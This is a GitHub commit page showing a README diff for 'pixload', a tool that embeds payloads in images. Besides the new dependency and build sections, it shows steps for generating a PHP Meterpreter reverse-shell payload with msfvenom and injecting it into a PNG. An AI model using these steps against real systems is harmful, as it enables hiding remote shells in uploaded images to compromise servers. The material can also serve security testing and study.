Skip to content

Commit

Permalink
README.md: add Dependencies/BuildAndInstall sections, minor changes
Browse files Browse the repository at this point in the history
  • Loading branch information
sighook committed Dec 6, 2021
1 parent d101f7d commit 8212198
Showing 1 changed file with 9 additions and 1 deletion.
10 changes: 9 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -39,11 +39,13 @@ $ msfvenom -p php/meterpreter_reverse_tcp \

3. Inject `payload.php` into the image (i.e. png).
```sh
./pixload-png -payload "$(cat payload.php)" -output payload.png
$ pixload-png -payload "$(cat payload.php)" -output payload.png
```

## SETUP

##### Dependencies

The following Perl modules are required:

* GD
Expand All @@ -66,6 +68,12 @@ doas pkg install p5-GD p5-Image-ExifTool p5-String-CRC32
On `OSX` please refer to [this workaround](https://github.com/chinarulezzz/pixload/issues/3)
(thnx 2 @iosdec).

##### Build and Install

```sh
make install
```

#### Docker

```sh
Expand Down

0 comments on commit 8212198

Please sign in to comment.